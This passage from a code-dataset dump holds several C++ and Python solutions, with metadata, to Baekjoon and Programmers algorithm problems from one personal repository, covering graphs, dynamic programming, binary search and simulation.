j++) {\n cin >> arr[i][j];\n }\n }\n\n dfs(0, 1, 0);\n\n cout << ans;\n return 0;\n}" }, { "alpha_fraction": 0.49655961990356445, "alphanum_fraction": 0.517201840877533, "avg_line_length": 16.816326141357422, "blob_id": "7fea9ec05dd7c573a6da6fe0efbe4d4a36be2b75", "content_id": "9ad0997e9d508a155bba2e7ec5348f77f661c5fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", 
"length_bytes": 880, "license_type": "no_license", "max_line_length": 61, "num_lines": 49, "path": "/programmers/Level 2/find_prime_number.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 2: 소수 찾기\n//2021-10-09\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <iostream>\n#include <math.h>\nusing namespace std;\n\nbool isPrime(int num) {\n if(num < 2) return false;\n \n for(int i = 2 ; i <= sqrt(num) ; i++) {\n if(num % i == 0) return false;\n }\n \n return true;\n}\n\nint solution(string numbers) {\n int answer = 0;\n vector<string> v;\n set<int> s;\n\n sort(numbers.begin(), numbers.end());\n \n do {\n string str;\n \n for(int i = 0 ; i < numbers.size() ; i++) {\n str += numbers[i];\n s.insert(stoi(str));\n }\n \n }while(next_permutation(numbers.begin(), numbers.end()));\n\n for(auto i : s) {\n if(isPrime(i)) answer++;\n }\n \n return answer;\n}\n\nint main() {\n int answer = solution(\"011\");\n cout << answer;\n\n return 0;\n}" }, { "alpha_fraction": 0.483205646276474, "alphanum_fraction": 0.49911609292030334, "avg_line_length": 22.91549301147461, "blob_id": "b1708c82a2d867c8b8d43cd2c6fccda30c6c9a61", "content_id": "a0d45f4bf1f30c9e0dbffc46f4f005cd2a17d7f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1763, "license_type": "no_license", "max_line_length": 88, "num_lines": 71, "path": "/programmers/Level 2/rank_search.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 순위 검색\n2021 KAKAO BLIND RECRUITMENT\n2022-04-18\n*/\n#include <string>\n#include <vector>\n#include <sstream>\n#include <algorithm>\n#include <unordered_map>\nusing namespace std;\n\nunordered_map<string, vector<int>> m; \n\nvector<string> split(string str, char del){\n vector<string> ret;\n istringstream iss(str);\n string buffer;\n \n while(getline(iss, buffer, del)) ret.push_back(buffer);\n \n return ret;\n}\n\nvoid getCombination(vector<string> v){\n for(int i = 0 ; i < 16 ; i++){\n string tmp;\n \n for(int j = 0 ; j < 4 ; j++){\n if(i & (1 << j)) tmp += \"-\";\n else tmp += v[j];\n }\n \n m[tmp].push_back(stoi(v[4]));\n }\n}\n\nvector<int> solution(vector<string> info, vector<string> query) {\n vector<int> answer;\n \n for(int i = 0 ; i < info.size() ; i++){\n vector<string> ret = split(info[i], ' ');\n getCombination(ret); // 해당 info로 만들 수 있는 모든 조합 만들고 점수 삽입\n }\n \n for(auto &i : m){\n sort(i.second.begin(), i.second.end());\n }\n \n for(int i = 0 ; i < query.size() ; i++){\n vector<string> ret = split(query[i], ' ');\n string tmp;\n \n for(int j = 0 ; j < ret.size() - 1 ; j++){\n if(ret[j] == \"and\") continue;\n tmp += ret[j];\n }\n \n vector<int> scores = m[tmp]; // query 조건을 만족하는 점수들\n \n if(scores.size() == 0) answer.push_back(0);\n else{\n int score = stoi(ret[7]);\n int idx = lower_bound(scores.begin(), scores.end(), score) - scores.begin();\n \n answer.push_back(scores.size() - idx);\n }\n }\n \n return answer;\n}" }, { "alpha_fraction": 0.4604026973247528, "alphanum_fraction": 0.4899328947067261, "avg_line_length": 18.128204345703125, "blob_id": "cbb9aae785b0e766bfbd4db92c4045f35b2ef780", "content_id": "b70a9d03a3e29b85991c75a7a1db92ca799799c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 761, "license_type": "no_license", "max_line_length": 70, "num_lines": 39, "path": "/programmers/Level 3/immigration.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": 
"/*\nprogrammers Level 3: 입국심사\n이분탐색\n2021-12-19\n*/\n#include <vector>\n#include <algorithm>\n#include <iostream>\n#define MAX 1e18\nusing namespace std;\n\nlong long solution(int n, vector<int> times) {\n long long answer = MAX;\n long long start = 0, end = MAX, mid, sum;\n \n sort(times.begin(), times.end());\n \n while(start <= end) {\n sum = 0;\n mid = (start + end) / 2;\n \n for(int i = 0 ; i < times.size() ; i++) sum += mid / times[i];\n \n if(sum >= n) {\n end = mid - 1;\n answer = min(mid, answer);\n }\n else {\n start = mid + 1;\n }\n }\n \n return answer;\n}\n\nint main() {\n long long answer = solution(6, {7, 10});\n cout << answer;\n}" }, { "alpha_fraction": 0.5010941028594971, "alphanum_fraction": 0.5470459461212158, "avg_line_length": 15.962963104248047, "blob_id": "7f9945080329a08f09e8279bd7cc5a5f23f9124c", "content_id": "fed28e2efc8ea44410ac416fe04233986a9c9efd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 465, "license_type": "no_license", "max_line_length": 85, "num_lines": 27, "path": "/BOJ/Implementation/4358.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 4358번: 생태학\nDATE: 2022-03-11\n*/\n#include <iostream>\n#include <string>\n#include <map>\nusing namespace std;\n\nmap<string, int> m;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n string str;\n int total = 0;\n\n while(getline(cin, str)){\n m[str]++;\n total++;\n }\n\n cout << fixed;\n cout.precision(4);\n for(auto i : m) cout << i.first << \" \" << (double)i.second / total * 100 << '\\n';\n\n return 0;\n}" }, { "alpha_fraction": 0.42171189188957214, "alphanum_fraction": 0.5114822387695312, "avg_line_length": 11.972972869873047, "blob_id": "b739c099b970145dda8f6237edaec93f725ed60e", "content_id": "11707c0636205c0f9e6603eda9c7c9fc0b15070f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 489, "license_type": "no_license", "max_line_length": 58, "num_lines": 37, "path": "/BOJ/Implementation/4673.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 4673번: 셀프 넘버\n2021-03-23\n*/\n#include <iostream>\n\nusing namespace std;\n\nint d(int num) {\n\tint sum = num;\n\n\twhile (num != 0) {\n\t\tsum += num % 10;\n\t\tnum = num / 10;\n\t}\n\n\treturn sum;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\tbool arr[10001] = { false, };\n\n\tfor (int i = 1; i <= 10000; i++) {\n\t\tint idx = d(i);\n\n\t\tif(idx <= 10000)\n\t\t\tarr[idx] = true;\n\t}\n\n\tfor (int i = 1; i <= 10000; i++) {\n\t\tif (!arr[i])\n\t\t\tcout << i << endl;\n\t}\n\n\treturn 0;\n}" }, { "alpha_fraction": 0.5260663628578186, "alphanum_fraction": 0.5734597444534302, "avg_line_length": 22.55555534362793, "blob_id": "5c65ce2123fef822b4f11609bd978d7560ba6ca0", "content_id": "b51848a67e7029614e6e03f0a3d5aa0d7fb31a40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 221, "license_type": "no_license", "max_line_length": 40, "num_lines": 9, "path": "/programmers/Level 1/add_yin_and_yang.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# programmers Level 1: 음양 더하기\n# date: 2022-04-14\ndef solution(absolutes, signs):\n answer = 0\n \n for a, s in zip(absolutes, signs):\n answer += a if s == True else -a\n \n return answer" }, { "alpha_fraction": 0.4934593141078949, "alphanum_fraction": 0.5167151093482971, "avg_line_length": 19.55223846435547, "blob_id": 
"482c180d00faa124070474b46b4ec649b70c0d13", "content_id": "e31c5aa92ee9645e3d976030e134286f5d54c19b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1390, "license_type": "no_license", "max_line_length": 59, "num_lines": 67, "path": "/BOJ/MST/1647.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1647번: 도시 분할 계획\n2021-12-29\nKruskal Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#define MAX 1000001\nusing namespace std;\n\npair<int, pair<int,int>> edge[MAX];\n\nint getParent(int parent[], int x) {\n if(parent[x] == x) return x;\n return parent[x] = getParent(parent, parent[x]);\n}\n\nvoid unionParent(int parent[], int a, int b){\n a = getParent(parent, a);\n b = getParent(parent, b);\n if(a < b) parent[b] = a;\n else parent[a] = b;\n}\n\nint findParent(int parent[], int a, int b){\n a = getParent(parent, a);\n b = getParent(parent, b);\n if(a == b) return 1;\n else return 0;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n int n, m;\n int a, b, c;\n int ans = 0, cnt = 0;\n cin >> n >> m;\n\n int parent[n + 1];\n for(int i = 1 ; i <= n ; i++) parent[i] = i;\n\n for(int i = 0 ; i < m ; i++) {\n cin >> a >> b >> c;\n edge[i].first = c; \n edge[i].second.first = a;\n edge[i].second.second = b;\n }\n\n sort(edge, edge + m);\n\n for(int i = 0 ; i < m ; i++) {\n int a = edge[i].second.first;\n int b = edge[i].second.second;\n int c = edge[i].first;\n\n if(findParent(parent, a, b)) continue;\n \n unionParent(parent, a, b);\n ans += c;\n if(++cnt == n - 2) break;\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.44155845046043396, "alphanum_fraction": 0.5038961172103882, "avg_line_length": 13.84615421295166, "blob_id": "bf01d2ff2ecd6bcb99924adb2308793a031966d5", "content_id": "7f1261c11d6ac52245382ff674d2de57709c8227", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 393, "license_type": "no_license", "max_line_length": 58, "num_lines": 26, "path": "/BOJ/Dynamic Programming/2193.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2193번: 이친수\nDATE: 2021-05-28\nDynamic programming\n*/\n#include <iostream>\n#define MAX 91\nusing namespace std;\n\nlong long dp[MAX];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n;\n cin >> n;\n\n dp[1] = dp[2] = 1;\n\n for(int i = 3 ; i < MAX ; i++){\n dp[i] = dp[i - 1] + dp[i - 2];\n }\n\n cout << dp[n] << '\\n';\n \n return 0;\n}" }, { "alpha_fraction": 0.3906829059123993, "alphanum_fraction": 0.4203282296657562, "avg_line_length": 22.625, "blob_id": "de5e573292c3d8c854669c6c92626a51709acb46", "content_id": "a2c8ffe4a254dd4c4cf43c489d5de3700b44702c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1889, "license_type": "no_license", "max_line_length": 75, "num_lines": 80, "path": "/programmers/Level 3/lock_and_key.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 3 : Lock and Key\n//2020 KAKAO BLIND RECRUITMENT\n//2021-05-29\n#include <string>\n#include <vector>\n#include <iostream>\nusing namespace std;\n\nbool sum(int x, int y, vector<vector<int>> key, vector<vector<int>> board){\n int M = key.size();\n int bs = board.size();\n \n for(int i = 0 ; i < M ; i++){\n for(int j = 0 ; j < M ; j++){\n board[x + i][y + j] += key[i][j];\n }\n }\n \n for(int i = M - 1 ; i < bs - M + 1; i++){\n for(int j = 
M - 1 ; j < bs - M + 1 ; j++){\n if(board[i][j] != 1)\n return false;\n }\n }\n \n return true;\n}\n\nvector<vector<int>> rotate(vector<vector<int>> key){\n int M = key.size();\n vector<vector<int>> tmp(M, vector<int>(M, 0));\n \n for(int i = 0 ; i < M ; i++){\n for(int j = 0 ; j < M ; j++){\n tmp[i][j] = key[M - j - 1][i];\n }\n }\n \n key = tmp;\n return key;\n}\n\nbool solution(vector<vector<int>> key, vector<vector<int>> lock) {\n bool answer = false;\n \n int M = key.size();\n int N = lock.size();\n int bs = lock.size() + (key.size() - 1)*2;\n vector<vector<int>> board(bs, vector<int>(bs, 0));\n \n for(int i = 0 ; i < N ; i++){\n for(int j = 0 ; j < N ; j++){\n board[i + M - 1][j + M - 1] = lock[i][j];\n }\n }\n \n for(int i = 0 ; i < 4 ; i++){\n for(int j = 0 ; j < M+N-1 ; j++){\n for(int k = 0 ; k < M+N-1 ; k++){\n if(sum(j, k , key, board)){\n answer = true;\n return answer;\n }\n }\n }\n key = rotate(key);\n }\n \n return answer;\n}\n\nint main(){\n vector<vector<int>> key = {{0, 0, 0}, {1, 0, 0}, {0, 1, 1}};\n vector<vector<int>> lock = {{1, 1, 1}, {1, 1, 0}, {1, 0, 1}};\n\n if(solution(key, lock)) cout << \"true\\n\";\n else cout << \"false\\n\";\n\n return 0;\n}" }, { "alpha_fraction": 0.4127906858921051, "alphanum_fraction": 0.4970930218696594, "avg_line_length": 14, "blob_id": "4756c1f10deb7d74799f5bb7c78dbe6ec56ad635", "content_id": "49bf0f6221bd9a395a28cd2e0218971d20525b19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 358, "license_type": "no_license", "max_line_length": 58, "num_lines": 23, "path": "/BOJ/Implementation/14681.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 14681번: 사분면 고르기\n2021-03-23\n*/\n#include <iostream>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\tint x, y;\n\tcin >> x >> y;\n\n\tif (x > 0 && y > 0)\n\t\tcout << 1;\n\telse if (x < 0 && y > 0)\n\t\tcout << 2;\n\telse if (x < 0 && y < 0)\n\t\tcout << 3;\n\telse if (x > 0 && y < 0)\n\t\tcout << 4;\n\t\n\treturn 0;\n}" }, { "alpha_fraction": 0.4692832827568054, "alphanum_fraction": 0.4957337975502014, "avg_line_length": 18.88135528564453, "blob_id": "68df5d3574a5231b917655052152a15038e88f75", "content_id": "e69f67dfbef801b76cff04414de2256122531715", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1196, "license_type": "no_license", "max_line_length": 95, "num_lines": 59, "path": "/BOJ/Dijkstra/1916.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1916번: 최소비용 구하기\n2021-12-28\nDijkstra Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\n#define MAX 1001\n#define INF 100000001\nusing namespace std;\n\nint d[MAX];\nvector<pair<int, int>> graph[MAX];\n\nvoid dijkstra(int start) { \n priority_queue<pair<int, int>, vector<pair<int,int>>, greater<pair<int,int>>> pq; // 거리, 노드\n\n pq.push({0, start});\n d[start] = 0;\n\n while(!pq.empty()) {\n int distance = pq.top().first;\n int cur = pq.top().second;\n pq.pop();\n\n if(d[cur] < distance) continue;\n for(int i = 0 ; i < graph[cur].size() ; i++) {\n int newDistance = graph[cur][i].second;\n int next = graph[cur][i].first;\n\n if(distance + newDistance < d[next]) {\n d[next] = distance + newDistance;\n pq.push({d[next], next});\n }\n }\n }\n}\n\nint main() {\n int n, m;\n int x, y, z;\n int a, b;\n cin >> n >> m;\n\n for(int i = 0 ; i < m ; i++) {\n cin >> x >> y >> z;\n graph[x].push_back(make_pair(y, z));\n }\n\n 
cin >> a >> b;\n\n fill(d, d + n + 1, INF);\n dijkstra(a);\n\n cout << d[b];\n\n return 0;\n}" }, { "alpha_fraction": 0.4473229646682739, "alphanum_fraction": 0.49740931391716003, "avg_line_length": 24.755556106567383, "blob_id": "d6efa24c2ccc473c27da5246bde7659319dcc178", "content_id": "34e63d36d2d02831c8c6048239c24c1d65a7226b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1168, "license_type": "no_license", "max_line_length": 98, "num_lines": 45, "path": "/BOJ/Dynamic Programming/2096.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2096번: 내려가기\nDATE: 2022-01-17\nDynamic Programming\nSliding Window\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, num;\n cin >> n;\n\n int minArr[3], maxArr[3], minTmp[3], maxTmp[3];\n int input[3];\n\n for(int i = 0 ; i < n ; i++){\n cin >> input[0] >> input[1] >> input[2];\n\n if(i == 0) {\n for(int j = 0 ; j < 3 ; j++) minTmp[j] = maxTmp[j] = minArr[j] = maxArr[j] = input[j];\n continue;\n }\n\n minArr[0] = input[0] + min(minTmp[0], minTmp[1]);\n maxArr[0] = input[0] + max(maxTmp[0], maxTmp[1]);\n\n minArr[1] = input[1] + min({minTmp[0], minTmp[1], minTmp[2]});\n maxArr[1] = input[1] + max({maxTmp[0], maxTmp[1], maxTmp[2]});\n\n minArr[2] = input[2] + min(minTmp[1], minTmp[2]);\n maxArr[2] = input[2] + max(maxTmp[1], maxTmp[2]);\n\n for(int j = 0 ; j < 3 ; j++){\n minTmp[j] = minArr[j];\n maxTmp[j] = maxArr[j];\n }\n }\n \n cout << *max_element(maxArr, maxArr + 3) << \" \" << *min_element(minArr, minArr + 3);\n\n return 0;\n}" }, { "alpha_fraction": 0.4417129158973694, "alphanum_fraction": 0.46708962321281433, "avg_line_length": 19.03174591064453, "blob_id": "d0dd9530d9530b80a325ba140b847e2f04563111", "content_id": "849f5e5a8fe0b35aa1b48234b9ae027883c1c36e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1309, "license_type": "no_license", "max_line_length": 58, "num_lines": 63, "path": "/BOJ/Graph Theory/1976.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 1976번: 여행 가자\nDATE: 2021-02-08\nUnion-Find\n*/\n#include <iostream>\n#define MAX 200\nusing namespace std;\n\nint arr[MAX][MAX];\n\nint getParent(int parent[], int x){\n if(parent[x] == x) return x;\n return parent[x] = getParent(parent, parent[x]);\n}\n\nvoid unionParent(int parent[], int a, int b){\n a = getParent(parent, a);\n b = getParent(parent, b);\n if(a < b) parent[b] = a;\n else parent[a] = b;\n}\n\n//같은 그래프에 속하는지 확인\nint findParent(int parent[], int a, int b){\n a = getParent(parent, a);\n b = getParent(parent, b);\n if(a == b) return 1;\n else return 0;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m;\n cin >> n >> m;\n\n int parent[n+1], dst[m];\n for(int i = 1 ; i <= n ; i++){\n parent[i] = i;\n }\n\n for(int i = 0 ; i < n ; i++){\n for(int j = 0 ; j < n ; j++){\n cin >> arr[i][j];\n if(arr[i][j] == 1 || i==j) //같은 부모 노드를 갖도록함\n unionParent(parent, i+1, j+1); \n }\n }\n\n for(int i = 0 ; i < m ; i++){\n cin >> dst[i];\n if(i > 0){\n if(!findParent(parent, dst[i-1], dst[i])){\n cout << \"NO\";\n return 0;\n }\n }\n }\n\n cout << \"YES\";\n\n return 0;\n}" }, { "alpha_fraction": 0.4082733690738678, "alphanum_fraction": 0.44964027404785156, "avg_line_length": 17.566667556762695, "blob_id": "f737a00b971f99ef2617e6c90eff5fd9e72853be", "content_id": 
"5a0a0be74dd9ebdfdd1922c9b46bda457fa3fc9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 590, "license_type": "no_license", "max_line_length": 58, "num_lines": 30, "path": "/BOJ/Implementation/12904.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 12904번: A와 B\nDATE: 2021-11-22\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n string s, t, tmp;\n cin >> s >> t;\n\n while(t.length() > s.length()){\n char last = t[t.length() - 1]; //t의 마지막 글자 \n t.erase(t.length() - 1, 1); //t의 마지막 글자 제거\n \n if(last == 'B'){\n reverse(t.begin(), t.end());\n }\n\n if(t == s) {\n cout << 1;\n return 0;\n }\n }\n\n cout << 0;\n return 0;\n}" }, { "alpha_fraction": 0.32930514216423035, "alphanum_fraction": 0.3645518720149994, "avg_line_length": 16.438596725463867, "blob_id": "3ed3b41c6e110d6703e486557591096d1b748bd4", "content_id": "5db392d0fb1fc91c4aa9c0d67d04e368f0aafd84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1041, "license_type": "no_license", "max_line_length": 58, "num_lines": 57, "path": "/BOJ/Binary Search/2343.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2343번: 기타 레슨\n2021-12-19\nBinary Search\n*/\n#include <iostream>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m, num, ans = 1000000000;\n int start, end, mid, sum, cnt;\n \n cin >> n >> m;\n\n int arr[n];\n\n for(int i = 0 ; i < n ; i++) {\n cin >> arr[i];\n sum += arr[i];\n }\n\n start = 1;\n end = sum;\n\n while(start <= end) {\n cnt = 1;\n sum = 0;\n mid = (start + end) / 2;\n\n for(int i = 0 ; i < n ; i++) {\n if(arr[i] > mid) { // 모든 강의가 들어가야 함\n cnt = n + 1; // M <= N (cnt는 무조건 M보다 크게 됨)\n break;\n }\n\n sum += arr[i];\n\n if(sum > mid){\n cnt++;\n sum = arr[i];\n }\n }\n\n if(cnt <= m) {\n ans = min(ans, mid);\n end = mid - 1;\n }\n else {\n start = mid + 1;\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.40717029571533203, "alphanum_fraction": 0.44430217146873474, "avg_line_length": 18.073171615600586, "blob_id": "91370efc4b060747f49bcd0884c6bf50820fdd55", "content_id": "f527fc1f3bc231b6ba674bb8f737da50e4bb6bcf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 795, "license_type": "no_license", "max_line_length": 74, "num_lines": 41, "path": "/BOJ/Dynamic Programming/14501.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 14501번: 퇴사\nDATE: 2021-10-07\nDynamic Programming\n*/\n#include <iostream>\n#include <algorithm>\n#include <vector>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, max_val;\n cin >> n;\n\n int arr[2][n];\n\n for(int i = 0 ; i < n ; i++) {\n vector<int> tmp;\n int t, p; //기간, 금액\n \n cin >> t >> p;\n arr[1][i] = t;\n\n if(i + t > n) {\n arr[0][i] = 0;\n continue;\n }\n\n for(int j = 0 ; j < i ; j++) {\n if(j + arr[1][j] <= i) tmp.push_back(arr[0][j]);\n }\n\n if(tmp.size() > 0) max_val = *max_element(tmp.begin(), tmp.end());\n arr[0][i] = max_val + p;\n }\n\n cout << *max_element(arr[0], arr[0] + n);\n\n return 0;\n}" }, { "alpha_fraction": 0.4497816562652588, "alphanum_fraction": 0.4606986939907074, "avg_line_length": 23.553571701049805, "blob_id": "ced03fd54aa575bb1842de59c4013509491a7572", "content_id": 
"2fed31925e1acfcf7f37cf3e0dedf7b1a03a6430", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1392, "license_type": "no_license", "max_line_length": 68, "num_lines": 56, "path": "/programmers/Level 2/menu_renewal.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 메뉴 리뉴얼\ndate: 2022-03-29\n*/\n#include <string>\n#include <vector>\n#include <algorithm>\n#include <map>\nusing namespace std;\n\nbool cmp(pair<string, int> a, pair<string, int> b){\n return a.second > b.second;\n}\n\nvector<string> solution(vector<string> orders, vector<int> course) {\n vector<string> answer;\n map<string, int> m; // 조합, 개수\n \n for(string i : orders){\n sort(i.begin(), i.end());\n \n for(int j : course){\n if(i.length() < j) continue;\n \n vector<bool> tmp(i.length(), true);\n for(int k = 0 ; k < j ; k++) tmp[k] = false;\n \n do{ \n string str;\n \n for(int k = 0 ; k < tmp.size() ; k++){\n if(!tmp[k]) str += i[k];\n }\n \n m[str]++;\n }while(next_permutation(tmp.begin(), tmp.end()));\n }\n }\n \n int arr[course.back() + 1];\n fill(arr, arr + course.back() + 1, 0);\n \n vector<pair<string, int>> v(m.begin(), m.end());\n sort(v.begin(), v.end(), cmp);\n \n for(auto i : v){\n if(i.second >= arr[i.first.length()] && i.second > 1) {\n arr[i.first.length()] = i.second;\n answer.push_back(i.first);\n }\n }\n \n sort(answer.begin(), answer.end());\n \n return answer;\n}" }, { "alpha_fraction": 0.3294491469860077, "alphanum_fraction": 0.3924788236618042, "avg_line_length": 29.467741012573242, "blob_id": "0de164123bd1d295b7a73b51745dad2615c72102", "content_id": "9f7550b57ddf57f67190c03f67558dbfbfcd786a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1894, "license_type": "no_license", "max_line_length": 94, "num_lines": 62, "path": "/BOJ/Dynamic Programming/17404.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 17404번: RGB거리 2\nDATE: 2021-07-29\nDynamic Programming\n*/\n#include <iostream>\n#include <algorithm>\n#define MAX 987654321\nusing namespace std;\n\nint input[1000][3];\nint house[3][1000][3];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, r, g, b, ans=MAX;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n cin >> r >> g >> b;\n input[i][0] = r;\n input[i][1] = g;\n input[i][2] = b;\n }\n\n for(int i = 0 ; i < 3 ; i++){\n copy(&input[0][0], &input[0][0] + 3000, &house[i][0][0]);\n \n for(int j = 0 ; j < 3 ; j++)\n if(i != j) house[i][0][j] = MAX;\n\n for(int j = 1 ; j < n ; j++){\n if(j == n -1){\n if(i == 0) {\n house[i][j][1] = min(house[i][j-1][0], house[i][j-1][2]) + house[i][j][1];\n house[i][j][2] = min(house[i][j-1][0], house[i][j-1][1]) + house[i][j][2];\n }\n else if(i == 1){\n house[i][j][0] = min(house[i][j-1][1], house[i][j-1][2]) + house[i][j][0];\n house[i][j][2] = min(house[i][j-1][0], house[i][j-1][1]) + house[i][j][2];\n }\n else if(i == 2){\n house[i][j][0] = min(house[i][j-1][1], house[i][j-1][2]) + house[i][j][0];\n house[i][j][1] = min(house[i][j-1][0], house[i][j-1][2]) + house[i][j][1];\n }\n\n house[i][j][i] = MAX;\n break;\n }\n\n house[i][j][0] = min(house[i][j-1][1], house[i][j-1][2]) + house[i][j][0];\n house[i][j][1] = min(house[i][j-1][0], house[i][j-1][2]) + house[i][j][1];\n house[i][j][2] = min(house[i][j-1][0], house[i][j-1][1]) + house[i][j][2];\n }\n\n ans = min(ans, *min_element(house[i][n-1], house[i][n-1] + 3));\n }\n\n cout << ans;\n\n return 0;\n}" }, { 
"alpha_fraction": 0.35011184215545654, "alphanum_fraction": 0.37322893738746643, "avg_line_length": 22.330434799194336, "blob_id": "47097805ede177ee97aae2aa58ee4d5607bebbd5", "content_id": "9865df3b7021dbf770f36668d9871169df9a90c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2778, "license_type": "no_license", "max_line_length": 74, "num_lines": 115, "path": "/BOJ/Implementation/16235.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 16235번: 나무 재테크\nDATE: 2022-02-09\nImplementation\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#define MAX 11\nusing namespace std;\n\nint n, m, k;\nint addition[MAX][MAX]; // 추가할 양분의 양\nint nutrient[MAX][MAX]; // 해당 칸에 존재하는 양분의 양\nvector<int> ground[MAX][MAX]; // 해당 칸에 존재하는 나무의 나이\nvector<pair<pair<int,int>, int>> death; // 죽은 나무의 위치와 나이\n\nvoid spring(){\n for(int i = 1 ; i <= n ; i++) {\n for(int j = 1 ; j <= n ; j++){\n sort(ground[i][j].begin(), ground[i][j].end());\n\n for(int k = 0 ; k < ground[i][j].size() ; k++){\n if(nutrient[i][j] >= ground[i][j][k]) {\n nutrient[i][j] -= ground[i][j][k];\n ground[i][j][k] += 1;\n }\n else {\n death.push_back({{i, j}, ground[i][j][k]});\n ground[i][j].erase(ground[i][j].begin() + k);\n k--;\n }\n }\n }\n }\n}\n\nvoid summer(){\n if(death.empty()) return;\n \n for(int i = 0 ; i < death.size() ; i++) {\n int x = death[i].first.first;\n int y = death[i].first.second;\n int add = death[i].second / 2;\n nutrient[x][y] += add;\n }\n\n death.clear();\n}\n\nvoid autumn(){ \n int dx[8] = {-1, -1, 0, 1, 1, 1, 0, -1};\n int dy[8] = {0, 1, 1, 1, 0, -1, -1, -1};\n\n for(int i = 1 ; i <= n ; i++) {\n for(int j = 1 ; j <= n ; j++){\n for(int k = 0 ; k < ground[i][j].size() ; k++){\n if(ground[i][j][k] % 5 == 0) {\n for(int l = 0 ; l < 8 ; l++) {\n int nx = dx[l] + i;\n int ny = dy[l] + j;\n\n if(nx < 1 || ny < 1 || nx > n || ny > n) continue;\n ground[nx][ny].push_back(1);\n }\n }\n }\n }\n }\n}\n\nvoid winter(){\n for(int i = 1 ; i <= n ; i++) {\n for(int j = 1 ; j <= n ; j++) {\n nutrient[i][j] += addition[i][j];\n }\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int x, y, z;\n int ans = 0;\n\n cin >> n >> m >> k;\n\n for(int i = 1 ; i <= n ; i++) {\n for(int j = 1 ; j <= n ; j++) {\n cin >> addition[i][j];\n nutrient[i][j] = 5;\n }\n }\n\n for(int i = 0 ; i < m 